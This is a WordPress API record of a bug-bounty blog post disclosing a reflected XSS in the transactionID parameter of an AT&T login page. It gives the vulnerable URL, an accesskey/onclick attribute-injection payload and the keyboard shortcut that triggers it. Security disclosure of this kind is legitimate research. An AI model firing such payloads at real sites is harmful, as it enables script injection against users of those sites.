{"id":208,"date":"2022-01-26T22:46:00","date_gmt":"2022-01-26T15:46:00","guid":{"rendered":"https:\/\/n45ht.or.id\/blog\/?p=208"},"modified":"2025-10-14T22:46:18","modified_gmt":"2025-10-14T15:46:18","slug":"reflected-xss-hidden-input-in-att","status":"publish","type":"post","link":"https:\/\/n45ht.or.id\/blog\/reflected-xss-hidden-input-in-att\/","title":{"rendered":"Reflected XSS Hidden Input in AT&T"},"content":{"rendered":"\n

During my testing of AT&T\u2019s common login page, I discovered a reflected XSS vulnerability<\/strong> in the transactionID<\/code> parameter. The vulnerability occurs due to improper handling of user input, allowing for the execution of malicious JavaScript.<\/p>\n\n\n\n

The vulnerable URL is:<\/p>\n\n\n\n

https://cprodmasx.att.com\/commonLogin\/igate_wam\/cancel2FAFlow.do?transactionID=dadada<\/code><\/pre>\n\n\n\n
Here, the transactionID<\/code> parameter is used within the page, which I suspected could be vulnerable to reflected XSS. By testing payloads, I found that this parameter does not sanitize input properly.<\/p>\n\n\n\n
I injected a simple XSS payload into the transactionID<\/code> parameter. The payload was as follows:<\/p>\n\n\n\n
'accesskey='x'onclick='confirm`1337`<\/code><\/pre>\n\n\n\n
When inserted into the URL, the payload looked like this:<\/p>\n\n\n\n
https://cprodmasx.att.com\/commonLogin\/igate_wam\/cancel2FAFlow.do?transactionID='accesskey='x'onclick='confirm`1337`<\/code><\/pre>\n\n\n\n
To trigger the XSS, I used keyboard shortcuts to activate the payload.<\/p>\n\n\n\n
    \n
  • Windows<\/strong>: Press ALT + SHIFT + X<\/code><\/li>\n\n\n\n
  • OS X<\/strong>: Press CTRL + ALT + X<\/code><\/li>\n<\/ul>\n\n\n\n
    This causes the payload to execute, showing a confirmation dialog with the message 1337<\/code>.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    #HappyHacking<\/p>\n\n\n\n
    <\/p>\n","protected":false},"excerpt":{"rendered":"
    During my testing of AT&T\u2019s common login page, I discovered a reflected XSS vulnerability in the transactionID parameter. The vulnerability occurs due to improper handling of user input, allowing for the execution of malicious JavaScript. The vulnerable URL is: Here, the transactionID parameter is used within the page, which I suspected could be vulnerable to […]<\/p>\n","protected":false},"author":2,"featured_media":312,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[23,9,8],"class_list":["post-208","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-research","tag-bug-bounty","tag-cross-site-scripting","tag-xss"],"_links":{"self":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/208","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/comments?post=208"}],"version-history":[{"count":5,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/208\/revisions"}],"predecessor-version":[{"id":313,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/208\/revisions\/313"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media\/312"}],"wp:attachment":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media?parent=208"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/categories?post=208"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/tags?post=208"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}